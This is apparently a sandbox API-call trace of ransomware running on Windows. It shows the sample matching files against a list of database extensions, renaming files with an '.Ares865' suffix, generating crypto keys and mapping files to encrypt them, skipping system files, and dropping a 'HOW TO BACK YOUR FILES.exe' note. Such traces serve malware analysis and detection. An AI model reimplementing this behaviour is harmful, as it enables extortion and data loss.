lstrlenW (lpString="db-journal") returned 10 [0060.149] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.149] lstrlenW (lpString="db-shm") returned 6 [0060.149] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.149] lstrlenW (lpString="db-wal") returned 6 [0060.149] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.149] lstrlenW (lpString="dbc") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.149] lstrlenW (lpString="dbs") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.149] lstrlenW (lpString="dbt") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.149] lstrlenW (lpString="dbv") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.150] lstrlenW (lpString="dbx") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.150] lstrlenW (lpString="dcb") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.150] lstrlenW (lpString="dct") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.150] lstrlenW (lpString="dcx") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.150] lstrlenW (lpString="ddl") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.150] lstrlenW (lpString="dlis") returned 4 [0060.150] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.150] lstrlenW (lpString="dp1") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.150] lstrlenW (lpString="dqy") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.150] lstrlenW (lpString="dsk") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.150] lstrlenW (lpString="dsn") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.150] lstrlenW (lpString="dtsx") returned 4 [0060.150] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.150] lstrlenW (lpString="dxl") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.150] lstrlenW (lpString="eco") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.150] lstrlenW (lpString="ecx") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.150] lstrlenW (lpString="edb") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.150] lstrlenW (lpString="epim") returned 4 [0060.150] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.150] lstrlenW (lpString="fcd") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.150] lstrlenW (lpString="fdb") returned 3 [0060.150] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.151] lstrlenW (lpString="fic") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.151] lstrlenW (lpString="flexolibrary") returned 12 [0060.151] lstrlenW (lpString="fm5") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.151] lstrlenW (lpString="fmp") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.151] lstrlenW (lpString="fmp12") returned 5 [0060.151] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.151] lstrlenW (lpString="fmpsl") returned 5 [0060.151] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.151] lstrlenW (lpString="fol") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.151] lstrlenW (lpString="fp3") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.151] lstrlenW (lpString="fp4") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.151] lstrlenW (lpString="fp5") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.151] lstrlenW (lpString="fp7") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.151] lstrlenW (lpString="fpt") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.151] lstrlenW (lpString="frm") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.151] lstrlenW (lpString="gdb") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.151] lstrlenW (lpString="gdb") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.151] lstrlenW (lpString="grdb") returned 4 [0060.151] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.151] lstrlenW (lpString="gwi") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.151] lstrlenW (lpString="hdb") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.151] lstrlenW (lpString="his") returned 3 [0060.151] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.151] lstrlenW (lpString="ib") returned 2 [0060.151] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.152] lstrlenW (lpString="idb") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.152] lstrlenW (lpString="ihx") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.152] lstrlenW (lpString="itdb") returned 4 [0060.152] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.152] lstrlenW (lpString="itw") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.152] lstrlenW (lpString="jet") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.152] lstrlenW (lpString="jtx") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.152] lstrlenW (lpString="kdb") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.152] lstrlenW (lpString="kexi") returned 4 [0060.152] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.152] lstrlenW (lpString="kexic") returned 5 [0060.152] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.152] lstrlenW (lpString="kexis") returned 5 [0060.152] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.152] lstrlenW (lpString="lgc") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.152] lstrlenW (lpString="lwx") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.152] lstrlenW (lpString="maf") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.152] lstrlenW (lpString="maq") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.152] lstrlenW (lpString="mar") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.152] lstrlenW (lpString="marshal") returned 7 [0060.152] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.152] lstrlenW (lpString="mas") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.152] lstrlenW (lpString="mav") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.152] lstrlenW (lpString="maw") returned 3 [0060.152] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.152] lstrlenW (lpString="mdbhtml") returned 7 [0060.153] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.153] lstrlenW (lpString="mdn") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.153] lstrlenW (lpString="mdt") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.153] lstrlenW (lpString="mfd") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.153] lstrlenW (lpString="mpd") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.153] lstrlenW (lpString="mrg") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.153] lstrlenW (lpString="mud") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.153] lstrlenW (lpString="mwb") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.153] lstrlenW (lpString="myd") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.153] lstrlenW (lpString="ndf") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.153] lstrlenW (lpString="nnt") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.153] lstrlenW (lpString="nrmlib") returned 6 [0060.153] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.153] lstrlenW (lpString="ns2") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.153] lstrlenW (lpString="ns3") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.153] lstrlenW (lpString="ns4") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.153] lstrlenW (lpString="nsf") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.153] lstrlenW (lpString="nv") returned 2 [0060.153] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.153] lstrlenW (lpString="nv2") returned 3 [0060.153] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.153] lstrlenW (lpString="nwdb") returned 4 [0060.153] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.153] lstrlenW (lpString="nyf") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.154] lstrlenW (lpString="odb") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.154] lstrlenW (lpString="odb") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.154] lstrlenW (lpString="oqy") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.154] lstrlenW (lpString="ora") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.154] lstrlenW (lpString="orx") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.154] lstrlenW (lpString="owc") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.154] lstrlenW (lpString="p96") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.154] lstrlenW (lpString="p97") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.154] lstrlenW (lpString="pan") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.154] lstrlenW (lpString="pdb") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.154] lstrlenW (lpString="pdm") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.154] lstrlenW (lpString="pnz") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.154] lstrlenW (lpString="qry") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.154] lstrlenW (lpString="qvd") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.154] lstrlenW (lpString="rbf") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.154] lstrlenW (lpString="rctd") returned 4 [0060.154] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.154] lstrlenW (lpString="rod") returned 3 [0060.154] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.154] lstrlenW (lpString="rodx") returned 4 [0060.154] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.154] lstrlenW (lpString="rpd") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.155] lstrlenW (lpString="rsd") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.155] lstrlenW (lpString="sas7bdat") returned 8 [0060.155] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.155] lstrlenW (lpString="sbf") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.155] lstrlenW (lpString="scx") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.155] lstrlenW (lpString="sdb") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.155] lstrlenW (lpString="sdc") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.155] lstrlenW (lpString="sdf") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.155] lstrlenW (lpString="sis") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.155] lstrlenW (lpString="spq") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.155] lstrlenW (lpString="te") returned 2 [0060.155] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.155] lstrlenW (lpString="teacher") returned 7 [0060.155] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.155] lstrlenW (lpString="tmd") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.155] lstrlenW (lpString="tps") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.155] lstrlenW (lpString="trc") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.155] lstrlenW (lpString="trc") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.155] lstrlenW (lpString="trm") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.155] lstrlenW (lpString="udb") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.155] lstrlenW (lpString="udl") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.155] lstrlenW (lpString="usr") returned 3 [0060.155] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.156] lstrlenW (lpString="v12") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.156] lstrlenW (lpString="vis") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.156] lstrlenW (lpString="vpd") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.156] lstrlenW (lpString="vvv") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.156] lstrlenW (lpString="wdb") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.156] lstrlenW (lpString="wmdb") returned 4 [0060.156] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.156] lstrlenW (lpString="wrk") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.156] lstrlenW (lpString="xdb") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.156] lstrlenW (lpString="xld") returned 3 [0060.156] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.156] lstrlenW (lpString="xmlff") returned 5 [0060.156] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.156] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\desktop.ini.Ares865") returned 81 [0060.156] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0060.157] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.157] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0060.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.158] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.158] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.158] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.159] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x164 [0060.160] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0060.161] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.162] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.162] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.162] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.162] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.162] CloseHandle (hObject=0x164) returned 1 [0060.163] CloseHandle (hObject=0x15c) returned 1 [0060.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.164] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a3658a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.164] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.164] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0060.164] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.164] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0060.164] lstrcmpiW (lpString1="Low", lpString2=".") returned 1 [0060.164] lstrcmpiW (lpString1="Low", lpString2="..") returned 1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="windows") returned -1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="bootmgr") returned 1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="temp") returned -1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="pagefile.sys") returned -1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="boot") returned 1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="ids.txt") returned 1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="ntuser.dat") returned -1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="perflogs") returned -1 [0060.165] lstrcmpiW (lpString1="Low", lpString2="MSBuild") returned -1 [0060.165] lstrlenW (lpString="Low") returned 3 [0060.165] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\desktop.ini") returned 73 [0060.165] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Low" | out: lpString1="Low") returned="Low" [0060.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0060.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e9eb0 [0060.165] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0060.165] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="aoldtz.exe") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2=".") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="..") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="windows") returned -1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="bootmgr") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="temp") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="pagefile.sys") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="boot") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="ids.txt") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="ntuser.dat") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="perflogs") returned 1 [0060.165] lstrcmpiW (lpString1="Virtualized", lpString2="MSBuild") returned 1 [0060.165] lstrlenW (lpString="Virtualized") returned 11 [0060.165] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned 65 [0060.165] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Virtualized" | out: lpString1="Virtualized") returned="Virtualized" [0060.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0060.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x335068 [0060.165] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7c30 [0060.165] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 0 [0060.166] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.166] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0060.166] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" [0060.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0060.166] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0060.166] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned 73 [0060.166] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" [0060.166] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.166] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.167] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.167] GetLastError () returned 0x0 [0060.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.167] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 